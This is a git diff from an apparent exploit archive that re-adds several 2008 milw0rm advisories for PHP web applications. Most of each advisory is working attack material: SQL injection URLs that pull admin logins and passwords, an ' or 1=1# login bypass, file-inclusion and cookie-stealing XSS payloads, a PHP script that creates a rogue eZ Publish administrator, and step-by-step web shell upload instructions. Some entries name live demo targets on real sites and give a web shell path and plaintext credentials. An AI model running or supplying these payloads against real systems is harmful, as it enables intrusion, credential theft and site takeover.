+[+]exploit:
+[+]http://[website]/[script]/lire/index.php?rubid=1+union+select+1,@@version,3--
+[+]http://[website]/[script]/index.php?rubid=1+union+select+1,@@version,3--
+[+]l!ve demo:
+[+]http://demo.peel.fr/lire/index.php?rubid=1+union+select+1,@@version,3--
+ 
+----------------------------------------------------------------------------------------------------------------------
+[+]grettz : for my best frinde x.CJP.x / sousn / bbbbbbbb / and all mouslims and eid sa3id for all arabs and mouslimme
+----------------------------------------------------------------------------------------------------------------------
+SooN sub-z3ro.com
+
+# milw0rm.com [2008-12-09]
diff --git a/platforms/php/webapps/7396.txt b/platforms/php/webapps/7396.txt
index 827110ed5..6dcf19a08 100755
--- a/platforms/php/webapps/7396.txt
+++ b/platforms/php/webapps/7396.txt
@@ -1,23 +1,23 @@
-            ############### SuB-ZeRo ###############
-          ############### Dz-hackers #################
-         Netref 4.0  Remote SQL Injection Vulnerability
------------------------------------------------------------------------------------------------------------
-
-[+]Discovred by : SuB-ZeRo
-[+]Vendor URL : www.netref.net
-[+]downloader : http://www.phpscripts-fr.net/scripts/download.php?id=627
-[+]home: www.sub-z3ro.com / www.h4ck3r-dz.com
-[+]ConTacTe: FbH@hotmail.com
-[+]DoRk: FiNd It (SoOrY)
-[+]exploit:
-[+]http://[website]/[script]/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
-[+]http://[website]/[script]/presentation.php?id=-1+union+select+1,2,password,4,5,login,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
-[+]l!ve demo:
-[+]http://netref.net/solutions/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
- 
-----------------------------------------------------------------------------------------------------------------------
-[+]grettz : for my best frinde x.CJP.x / sousn / and all mouslims and eid sa3id for all arabs and mouslimme
-----------------------------------------------------------------------------------------------------------------------
-sub-z3ro.com sOoN
-
-# milw0rm.com [2008-12-09]
+            ############### SuB-ZeRo ###############
+          ############### Dz-hackers #################
+         Netref 4.0  Remote SQL Injection Vulnerability
+-----------------------------------------------------------------------------------------------------------
+
+[+]Discovred by : SuB-ZeRo
+[+]Vendor URL : www.netref.net
+[+]downloader : http://www.phpscripts-fr.net/scripts/download.php?id=627
+[+]home: www.sub-z3ro.com / www.h4ck3r-dz.com
+[+]ConTacTe: FbH@hotmail.com
+[+]DoRk: FiNd It (SoOrY)
+[+]exploit:
+[+]http://[website]/[script]/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
+[+]http://[website]/[script]/presentation.php?id=-1+union+select+1,2,password,4,5,login,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
+[+]l!ve demo:
+[+]http://netref.net/solutions/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
+ 
+----------------------------------------------------------------------------------------------------------------------
+[+]grettz : for my best frinde x.CJP.x / sousn / and all mouslims and eid sa3id for all arabs and mouslimme
+----------------------------------------------------------------------------------------------------------------------
+sub-z3ro.com sOoN
+
+# milw0rm.com [2008-12-09]
diff --git a/platforms/php/webapps/7397.txt b/platforms/php/webapps/7397.txt
index 49274d39d..a37982ea7 100755
--- a/platforms/php/webapps/7397.txt
+++ b/platforms/php/webapps/7397.txt
@@ -1,32 +1,32 @@
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
- [0] GENERAL DETAILS:
-
-Name           :  ProQuiz 1.0 Sql Injection (Auth bypass)
-Download       :  http://sourceforge.net/project/downloading.php?group_id=246466&use_mirror=kent&filename=ProQuiz.zip&65145754
-Vulnerability  :  Sql Injection (Admin Login Bypass)
-Author         :  Osirys
-Contact        :  osirys[at]live[dot]it
-
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
- [1] BUG EXPLANATION:
-
-The affected file is /admin/index.php. Let's see the code.
-
-[CODE]
-if($_GET['menu'] != 'madmin')
-	{
-	if(isset($_POST['username']) && isset($_POST['password']))
-		{
-			$query = "SELECT * FROM ".$member_admin." WHERE `username` = '".$_POST['username']."' AND `password` = '".$_POST['password']."' ";
-[/CODE]
-
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
- [2] EXPLOITATION:
-
-Just go in /[path]/admin/index.php. Login with the following details:
-Username : ' or 1=1#
-Password : anything
-
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-12-09]
+----------------------------------------------------------------------------------------------------------------------------------------------------------------
+ [0] GENERAL DETAILS:
+
+Name           :  ProQuiz 1.0 Sql Injection (Auth bypass)
+Download       :  http://sourceforge.net/project/downloading.php?group_id=246466&use_mirror=kent&filename=ProQuiz.zip&65145754
+Vulnerability  :  Sql Injection (Admin Login Bypass)
+Author         :  Osirys
+Contact        :  osirys[at]live[dot]it
+
+----------------------------------------------------------------------------------------------------------------------------------------------------------------
+ [1] BUG EXPLANATION:
+
+The affected file is /admin/index.php. Let's see the code.
+
+[CODE]
+if($_GET['menu'] != 'madmin')
+	{
+	if(isset($_POST['username']) && isset($_POST['password']))
+		{
+			$query = "SELECT * FROM ".$member_admin." WHERE `username` = '".$_POST['username']."' AND `password` = '".$_POST['password']."' ";
+[/CODE]
+
+----------------------------------------------------------------------------------------------------------------------------------------------------------------
+ [2] EXPLOITATION:
+
+Just go in /[path]/admin/index.php. Login with the following details:
+Username : ' or 1=1#
+Password : anything
+
+----------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-12-09]
diff --git a/platforms/php/webapps/7399.txt b/platforms/php/webapps/7399.txt
index 30c9bdab1..4d41d95b7 100755
--- a/platforms/php/webapps/7399.txt
+++ b/platforms/php/webapps/7399.txt
@@ -1,30 +1,30 @@
-*****************************************************************************************
-
-Phpmygallery-1.5beta (common-tpl-vars.php) Multiple Local File Inclusion Vulnerabilities
-
-*****************************************************************************************
- 
-Script Name: Phpmygallery
- 
-Version: 1.5beta
- 
-Autor: CoBRa_21
- 
-My Site: www.ipbul.org
- 
-Download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.5beta.zip
- 
-*****************************************************************************************
- 
-Exploit:
- 
-http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LFÄ°] (Windows Only)
-http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI]
-
-*****************************************************************************************
-
-Not: Tüm İslam Aleminin Kurban Bayramı Mobarek Olsun
-
-*****************************************************************************************
-
-# milw0rm.com [2008-12-09]
+*****************************************************************************************
+
+Phpmygallery-1.5beta (common-tpl-vars.php) Multiple Local File Inclusion Vulnerabilities
+
+*****************************************************************************************
+ 
+Script Name: Phpmygallery
+ 
+Version: 1.5beta
+ 
+Autor: CoBRa_21
+ 
+My Site: www.ipbul.org
+ 
+Download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.5beta.zip
+ 
+*****************************************************************************************
+ 
+Exploit:
+ 
+http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LFÄ°] (Windows Only)
+http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI]
+
+*****************************************************************************************
+
+Not: Tüm İslam Aleminin Kurban Bayramı Mobarek Olsun
+
+*****************************************************************************************
+
+# milw0rm.com [2008-12-09]
diff --git a/platforms/php/webapps/740.pl b/platforms/php/webapps/740.pl
index f5866cf40..78deab8f5 100755
--- a/platforms/php/webapps/740.pl
+++ b/platforms/php/webapps/740.pl
@@ -70,6 +70,6 @@ if($sitevul !~/http/){ $sitevul = 'http://' . $sitevul; }
 $teste1 = get($sitevul) or next;
 $teste1 = "";
 }
-}
-
-# milw0rm.com [2005-01-04]
+}
+
+# milw0rm.com [2005-01-04]
diff --git a/platforms/php/webapps/7400.txt b/platforms/php/webapps/7400.txt
index d1f1a6d63..de5d127c8 100755
--- a/platforms/php/webapps/7400.txt
+++ b/platforms/php/webapps/7400.txt
@@ -1,26 +1,26 @@
-****(Lfi/xss)****
-
-script: PHP_Multiple_Newsletters v2.7
-
-***************************************************************************
-download from:http://www.phpmultiplenewsletters.com/modules/phpmultiplenewsletters.com/dist/free/PHP_Multiple_Newsletters_v2.7.zip
-   
-***************************************************************************
-vul:/index.php
-line 36:
-include ('language/'..$_REQUEST['lang'].'.php');
-   
-***************************************************
-xpl:
-www.site.com/path/index.php?lang=[Lfi]%00
-
-xss:
-www.site.com/path/index.php/>"><ScRiPt>alert(document.cookie)</ScRiPt>
-...................................................
-Author: ahmadbady from:iran
-
-my mail: kivi_hacker666@yahoo.com
-
-***************************************************
-
-# milw0rm.com [2008-12-09]
+****(Lfi/xss)****
+
+script: PHP_Multiple_Newsletters v2.7
+
+***************************************************************************
+download from:http://www.phpmultiplenewsletters.com/modules/phpmultiplenewsletters.com/dist/free/PHP_Multiple_Newsletters_v2.7.zip
+   
+***************************************************************************
+vul:/index.php
+line 36:
+include ('language/'..$_REQUEST['lang'].'.php');
+   
+***************************************************
+xpl:
+www.site.com/path/index.php?lang=[Lfi]%00
+
+xss:
+www.site.com/path/index.php/>"><ScRiPt>alert(document.cookie)</ScRiPt>
+...................................................
+Author: ahmadbady from:iran
+
+my mail: kivi_hacker666@yahoo.com
+
+***************************************************
+
+# milw0rm.com [2008-12-09]
diff --git a/platforms/php/webapps/7406.php b/platforms/php/webapps/7406.php
index ca9f798a1..dcbc3ee46 100755
--- a/platforms/php/webapps/7406.php
+++ b/platforms/php/webapps/7406.php
@@ -1,123 +1,123 @@
-<?php
-
-/*
-	eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru]
-	Versions affected >= 3.5.6
-	Resolved in 3.9.5, 3.10.1, 4.0.1
-	More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible
-
-	* tested on version 3.9.0
-
-	usage: 
-
-	# ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server
-
-	The options are required:
-
-	-u Login of the new admin on eZ Publish
-	-p Password of the new admin on eZ Publish
-	-e Email where to go the letter for activation new admin account
-	-s Target for privilege escalation
-
-	example:
-
-	# ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
-	[+] Exploit successfully sending
-	[+] Activate your new account and be registered in system using toor/P@ssw0rd
-*/
-
-function help_argc($script_name)
-{
-print "
-usage:
-
-# ./".$script_name." -u=username -p=password -e=email -s=EZPublish_server
-
-The options are required:
- -u Login of the new admin on eZ Publish
- -p Password of the new admin on eZ Publish
- -e Email where to go the letter for activation new admin account
- -s Target for privilege escalation
-
-example:
-
-# ./".$script_name." -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
-[+] Exploit successfully sending
-[+] Activate your new account and be registered in system using toor/P@ssw0rd
-
-";
-}
-
-function successfully($login,$password)
-{
-print "
-[+] Exploit successfully sending
-[+] Activate your new account and be registered in system using $login/$password
-";
-}
-
-if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?')))
-{
-	help_argc($argv[0]);
-	exit(0);
-}
-else
-{
-	$ARG = array(); 
-	foreach ($argv as $arg) { 
-		if (strpos($arg, '-') === 0) { 
-			$key = substr($arg,1,1);
-			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); 
-		} 
-	}
-
-	if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s])
-	{
-
-		$post_fields = array(
-			'ContentObjectAttribute_data_user_login_30' => $ARG[u],
-			'ContentObjectAttribute_data_user_password_30' => $ARG[p],
-			'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
-			'ContentObjectAttribute_data_user_email_30' => $ARG[e],
-			'UserID' => '14',
-			'PublishButton' => '1'
-		);
-
-		$headers = array(
-		    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
-		    'Referer' => $ARG[s]
-		);
-
-		$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
-		$res_http->addPostFields($post_fields);
-		$res_http->addHeaders($headers);
-		try {
-    			$response = $res_http->send()->getBody();
-
-			if (eregi("success", $response))
-			{
-				successfully($ARG[u],$ARG[p]);
-			}
-			else
-			{
-				print "[-] Exploit failed";
-			}
-
-		} catch (HttpException $exception) {
-
-			print "[-] Not connected";
-			exit(0);
-
-		}
-
-	}
-	else
-	{
-		help_argc($argv[0]);
-		exit(0);
-	} 
-}
-
-?>
-
-# milw0rm.com [2008-12-10]
+<?php
+
+/*
+	eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru]
+	Versions affected >= 3.5.6
+	Resolved in 3.9.5, 3.10.1, 4.0.1
+	More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible
+
+	* tested on version 3.9.0
+
+	usage: 
+
+	# ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server
+
+	The options are required:
+
+	-u Login of the new admin on eZ Publish
+	-p Password of the new admin on eZ Publish
+	-e Email where to go the letter for activation new admin account
+	-s Target for privilege escalation
+
+	example:
+
+	# ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
+	[+] Exploit successfully sending
+	[+] Activate your new account and be registered in system using toor/P@ssw0rd
+*/
+
+function help_argc($script_name)
+{
+print "
+usage:
+
+# ./".$script_name." -u=username -p=password -e=email -s=EZPublish_server
+
+The options are required:
+ -u Login of the new admin on eZ Publish
+ -p Password of the new admin on eZ Publish
+ -e Email where to go the letter for activation new admin account
+ -s Target for privilege escalation
+
+example:
+
+# ./".$script_name." -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
+[+] Exploit successfully sending
+[+] Activate your new account and be registered in system using toor/P@ssw0rd
+
+";
+}
+
+function successfully($login,$password)
+{
+print "
+[+] Exploit successfully sending
+[+] Activate your new account and be registered in system using $login/$password
+";
+}
+
+if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?')))
+{
+	help_argc($argv[0]);
+	exit(0);
+}
+else
+{
+	$ARG = array(); 
+	foreach ($argv as $arg) { 
+		if (strpos($arg, '-') === 0) { 
+			$key = substr($arg,1,1);
+			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); 
+		} 
+	}
+
+	if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s])
+	{
+
+		$post_fields = array(
+			'ContentObjectAttribute_data_user_login_30' => $ARG[u],
+			'ContentObjectAttribute_data_user_password_30' => $ARG[p],
+			'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
+			'ContentObjectAttribute_data_user_email_30' => $ARG[e],
+			'UserID' => '14',
+			'PublishButton' => '1'
+		);
+
+		$headers = array(
+		    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
+		    'Referer' => $ARG[s]
+		);
+
+		$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
+		$res_http->addPostFields($post_fields);
+		$res_http->addHeaders($headers);
+		try {
+    			$response = $res_http->send()->getBody();
+
+			if (eregi("success", $response))
+			{
+				successfully($ARG[u],$ARG[p]);
+			}
+			else
+			{
+				print "[-] Exploit failed";
+			}
+
+		} catch (HttpException $exception) {
+
+			print "[-] Not connected";
+			exit(0);
+
+		}
+
+	}
+	else
+	{
+		help_argc($argv[0]);
+		exit(0);
+	} 
+}
+
+?>
+
+# milw0rm.com [2008-12-10]
diff --git a/platforms/php/webapps/7407.txt b/platforms/php/webapps/7407.txt
index 77b891a0b..fa4ff4a9b 100755
--- a/platforms/php/webapps/7407.txt
+++ b/platforms/php/webapps/7407.txt
@@ -1,45 +1,45 @@
-Webmaster Marketplace (member.php u) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :IQ-SecuriTY >   www.IQ-TY.com   |  TrYaG > www.TrYaG.cc
-
-Mail :  darkangel_G85@yahoo.com
-
-___________________________________
-
-script  : http://www.unscripts.com/MPS.html
-
-DorK : :(
-
-exploit :
-_______
-
-http://www.site.com/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
-
-
-
-Demo :
-_______
-
-http://www.unscripts.com/MPS/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
-
-
-login :
-http://www.site.com/Admin/login.php
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC
-|
-|  My friends : str0ke | DeViL iRaQ | IRAQ_JAGUR |  Sakab
-|
-|   FAHD |  jiko | IRAQ DiveR | Cyber-Zone | CraCkEr | G4N0K
-|_____________________________________________________________________
-
-
-
-                             IM IraQi    |       IM TrYaGi
-
-# milw0rm.com [2008-12-10]
+Webmaster Marketplace (member.php u) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :IQ-SecuriTY >   www.IQ-TY.com   |  TrYaG > www.TrYaG.cc
+
+Mail :  darkangel_G85@yahoo.com
+
+___________________________________
+
+script  : http://www.unscripts.com/MPS.html
+
+DorK : :(
+
+exploit :
+_______
+
+http://www.site.com/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
+
+
+
+Demo :
+_______
+
+http://www.unscripts.com/MPS/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
+
+
+login :
+http://www.site.com/Admin/login.php
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC
+|
+|  My friends : str0ke | DeViL iRaQ | IRAQ_JAGUR |  Sakab
+|
+|   FAHD |  jiko | IRAQ DiveR | Cyber-Zone | CraCkEr | G4N0K
+|_____________________________________________________________________
+
+
+
+                             IM IraQi    |       IM TrYaGi
+
+# milw0rm.com [2008-12-10]
diff --git a/platforms/php/webapps/7408.txt b/platforms/php/webapps/7408.txt
index d6fe2dcc3..14953f971 100755
--- a/platforms/php/webapps/7408.txt
+++ b/platforms/php/webapps/7408.txt
@@ -1,48 +1,48 @@
-Authot: Bgh7
- 
-Home: http://ozelteam.com - Turk Bilisim Gücleri
- 
-Pst: bybgh7@msn.com
- 
-=============================
- 
-Dork: allinurl:clientsignup.php "classifieds"
- 
-Dork2: Powered By: Living Local V1.1
- 
-Demo: http://www.jerseyads.net/listtest.php?r="><script>alert()</script>
- 
-Demo2: http://homes.relatedlistings.com/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
- 
-http://homes.relatedlistings.com/Member_Admin/
- 
-E-Mail: bybgh7@msn.com
-Password: tbg1122
-=============================
- 
-you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol )
-
-and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap )
-
-after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] )
-
-or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla )
-
-and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et )
-
-after click to submit button. you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin )
-
-if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI )
-
-after repeat click to "Edit Account Info" and open page. your logo right click and properties select this link copy
-
-after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla
-
-acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas )
- 
- 
-==========================
- 
-Thanks: str0ke - ÇılgınTurk
-
-# milw0rm.com [2008-12-10]
+Authot: Bgh7
+ 
+Home: http://ozelteam.com - Turk Bilisim Gücleri
+ 
+Pst: bybgh7@msn.com
+ 
+=============================
+ 
+Dork: allinurl:clientsignup.php "classifieds"
+ 
+Dork2: Powered By: Living Local V1.1
+ 
+Demo: http://www.jerseyads.net/listtest.php?r="><script>alert()</script>
+ 
+Demo2: http://homes.relatedlistings.com/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
+ 
+http://homes.relatedlistings.com/Member_Admin/
+ 
+E-Mail: bybgh7@msn.com
+Password: tbg1122
+=============================
+ 
+you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol )
+
+and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap )
+
+after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] )
+
+or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla )
+
+and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et )
+
+after click to submit button. you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin )
+
+if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI )
+
+after repeat click to "Edit Account Info" and open page. your logo right click and properties select this link copy
+
+after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla
+
+acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas )
+ 
+ 
+==========================
+ 
+Thanks: str0ke - ÇılgınTurk
+
+# milw0rm.com [2008-12-10]
diff --git a/platforms/php/webapps/7409.txt b/platforms/php/webapps/7409.txt
index e2ef48850..9758370d7 100755
--- a/platforms/php/webapps/7409.txt
+++ b/platforms/php/webapps/7409.txt
@@ -1,96 +1,96 @@
-#########################################################################
-Pro Chat Rooms Version 3.0.2  (XSS/CSRF) Vulnerabilties
-#########################################################################
- 
- 
-## AUTHOR : ZynbER
-## MAiL   : ZynbER[at]Gmail[dot]com
-## HOME   : NoWhere
- 
- 
-## Script WebSite : http://www.prochatrooms.com
- 
-## Version : Pro Chat Rooms Version 3.0.2
- 
- 
-## EXPLOITS :
- 
--==XSS==-
- 
-http://www.yoursite.com/[path]/profiles/index.php?gud=XSSED
- 
-Vulnerable code in "/profiles/index.php"
- 
- 
-<b><?php echo C_PRO2;?>: <?php echo $_GET['gud'];?></b>
- 
- 
--==CSRF==-
- 
-When a user sends a message in public room or in pm to onther user ; there is a parameter
-to set an avatar (ex:"image.gif"); we will exploit this param to run a CSRF when user get our message
- 
-The JS sending function; here u can see all params needed to POST a message to user/room
- 
-//Add a message to the chat server.
-function sendChatText() {
- 
-if(!document.getElementById('txt_message').value) {
-   alert("You have not entered a message ");
-   return;
-}
-    if(document.getElementById('whisper').value.toLowerCase() == document.getElementById('thisuser').value.toLowerCase()) {
-    alert("You cannot whisper to yourself! ");
-    return;
-}
-if (sendReq.readyState == 4 || sendReq.readyState == 0) {
-    sendReq.open("POST", 'sendData.php?chat=1&last=' + lastMessage + '&room=' + room, true);
-    sendReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
-    sendReq.onreadystatechange = handleSendChat;  
-    var param = 'message=' + document.getElementById('txt_message').value;
-    param += '&name=' + chat_user;
-    param += '&nid=' + chat_userid;
-    param += '&chat=1';
-    param += '&room=' + room;
-    param += '&whisper=' + document.getElementById('whisper').value;
-    param += '&fontface=' + document.getElementById('font_face').value;
-    param += '&fontcolor=' + document.getElementById('font_color').value;
-    param += '&fontheight=' + document.getElementById('font_height').value;
-    param += '&fontstyle=' + document.getElementById('font_style').value;
-    param += '&avatar=' + document.getElementById('user_avatar').value;
-    sendReq.send(param);
-    document.getElementById('txt_message').value = '';
-    }                            
-}
- 
- 
-Exploit Example:
- 
-default  ==> http://www.yoursite.com/[path]/Avatars/online.gif
- 
- 
-Your mallecious CSRF param;  avatar=../logout.php ==> New avatar path http://www.yoursite.com/[path]/logout.php
- 
- 
-in this example the user will logout when he recieves ur message; in a public room all users will
-be loged out from the room ;)
- 
- 
- 
- 
-## Note:  
- 
-This infos are for educational purpose only;  
-I'm not responsable for any damage caused...
- 
- 
- 
-## GREETZ  :  Str0ke - 7issa - Zakhm0ki - samIR - Chicha - Sn@k-baraka
- 
-        -=== Marequin est fière de l'être ===-
- 
-#########################################################################
-Pro Chat Rooms Version 3.0.2   (XSS/CSRF) Vulnerabilties
-#########################################################################
-
-# milw0rm.com [2008-12-10]
+#########################################################################
+Pro Chat Rooms Version 3.0.2  (XSS/CSRF) Vulnerabilties
+#########################################################################
+ 
+ 
+## AUTHOR : ZynbER
+## MAiL   : ZynbER[at]Gmail[dot]com
+## HOME   : NoWhere
+ 
+ 
+## Script WebSite : http://www.prochatrooms.com
+ 
+## Version : Pro Chat Rooms Version 3.0.2
+ 
+ 
+## EXPLOITS :
+ 
+-==XSS==-
+ 
+http://www.yoursite.com/[path]/profiles/index.php?gud=XSSED
+ 
+Vulnerable code in "/profiles/index.php"
+ 
+ 
+<b><?php echo C_PRO2;?>: <?php echo $_GET['gud'];?></b>
+ 
+ 
+-==CSRF==-
+ 
+When a user sends a message in public room or in pm to onther user ; there is a parameter
+to set an avatar (ex:"image.gif"); we will exploit this param to run a CSRF when user get our message
+ 
+The JS sending function; here u can see all params needed to POST a message to user/room
+ 
+//Add a message to the chat server.
+function sendChatText() {
+ 
+if(!document.getElementById('txt_message').value) {
+   alert("You have not entered a message ");
+   return;
+}
+    if(document.getElementById('whisper').value.toLowerCase() == document.getElementById('thisuser').value.toLowerCase()) {
+    alert("You cannot whisper to yourself! ");
+    return;
+}
+if (sendReq.readyState == 4 || sendReq.readyState == 0) {
+    sendReq.open("POST", 'sendData.php?chat=1&last=' + lastMessage + '&room=' + room, true);
+    sendReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
+    sendReq.onreadystatechange = handleSendChat;  
+    var param = 'message=' + document.getElementById('txt_message').value;
+    param += '&name=' + chat_user;
+    param += '&nid=' + chat_userid;
+    param += '&chat=1';
+    param += '&room=' + room;
+    param += '&whisper=' + document.getElementById('whisper').value;
+    param += '&fontface=' + document.getElementById('font_face').value;
+    param += '&fontcolor=' + document.getElementById('font_color').value;
+    param += '&fontheight=' + document.getElementById('font_height').value;
+    param += '&fontstyle=' + document.getElementById('font_style').value;
+    param += '&avatar=' + document.getElementById('user_avatar').value;
+    sendReq.send(param);
+    document.getElementById('txt_message').value = '';
+    }                            
+}
+ 
+ 
+Exploit Example:
+ 
+default  ==> http://www.yoursite.com/[path]/Avatars/online.gif
+ 
+ 
+Your mallecious CSRF param;  avatar=../logout.php ==> New avatar path http://www.yoursite.com/[path]/logout.php
+ 
+ 
+in this example the user will logout when he recieves ur message; in a public room all users will
+be loged out from the room ;)
+ 
+ 
+ 
+ 
+## Note:  
+ 
+This infos are for educational purpose only;  
+I'm not responsable for any damage caused...
+ 
+ 
+ 
+## GREETZ  :  Str0ke - 7issa - Zakhm0ki - samIR - Chicha - Sn@k-baraka
+ 
+        -=== Marequin est fière de l'être ===-
+ 
+#########################################################################
+Pro Chat Rooms Version 3.0.2   (XSS/CSRF) Vulnerabilties
+#########################################################################
+
+# milw0rm.com [2008-12-10]
diff --git a/platforms/php/webapps/7411.txt b/platforms/php/webapps/7411.txt
index bd9e5ed47..f0cc09efa 100755
--- a/platforms/php/webapps/7411.txt
+++ b/platforms/php/webapps/7411.txt
@@ -1,35 +1,35 @@
-#########################################################################################
-[0x01] Informations:
-
-Name           : Butterfly Organizer 2.0.1 Sql Injection
-Download       : http://www.hotscripts.com/jump.php?listing_id=72677&jump_type=1
-Vulnerability  : Remote Sql Injection
-Author         : Osirys
-Contact        : osirys[at]live[dot]it
-Notes          : Proud to be Italian
-*              : Same bug of the previous version: http://milw0rm.com/exploits/5797
-
-#########################################################################################
-[0x02] Bug:
-
-Bugged file is /[path]/view.php
-
-[CODE]
-$mytable = $_GET['mytable'];
-$id = $_GET['id'];
-
-$result = mysql_query("SELECT * FROM ".$mytable." WHERE id=$id",$database);
-$myrow = mysql_fetch_array($result);
-[/CODE]
-
-Query accept direct GET input, so we can inject hell sql code.
-To avoid this vulnerability, just escape GET input.
-
-#########################################################################################
-[0x03] Exploit:
-
-http://localhost/[path]/view.php?id=-1+union+select+0x49276d2076756c6e657261626c65203a28,2,3,name,url,username,password,8,9,10+from+test_category&mytable=test_category
-
-########################################################################################
-
-# milw0rm.com [2008-12-10]
+#########################################################################################
+[0x01] Informations:
+
+Name           : Butterfly Organizer 2.0.1 Sql Injection
+Download       : http://www.hotscripts.com/jump.php?listing_id=72677&jump_type=1
+Vulnerability  : Remote Sql Injection
+Author         : Osirys
+Contact        : osirys[at]live[dot]it
+Notes          : Proud to be Italian
+*              : Same bug of the previous version: http://milw0rm.com/exploits/5797
+
+#########################################################################################
+[0x02] Bug:
+
+Bugged file is /[path]/view.php
+
+[CODE]
+$mytable = $_GET['mytable'];
+$id = $_GET['id'];
+
+$result = mysql_query("SELECT * FROM ".$mytable." WHERE id=$id",$database);
+$myrow = mysql_fetch_array($result);
+[/CODE]
+
+Query accept direct GET input, so we can inject hell sql code.
+To avoid this vulnerability, just escape GET input.
+
+#########################################################################################
+[0x03] Exploit:
+
+http://localhost/[path]/view.php?id=-1+union+select+0x49276d2076756c6e657261626c65203a28,2,3,name,url,username,password,8,9,10+from+test_category&mytable=test_category
+
+########################################################################################
+
+# milw0rm.com [2008-12-10]
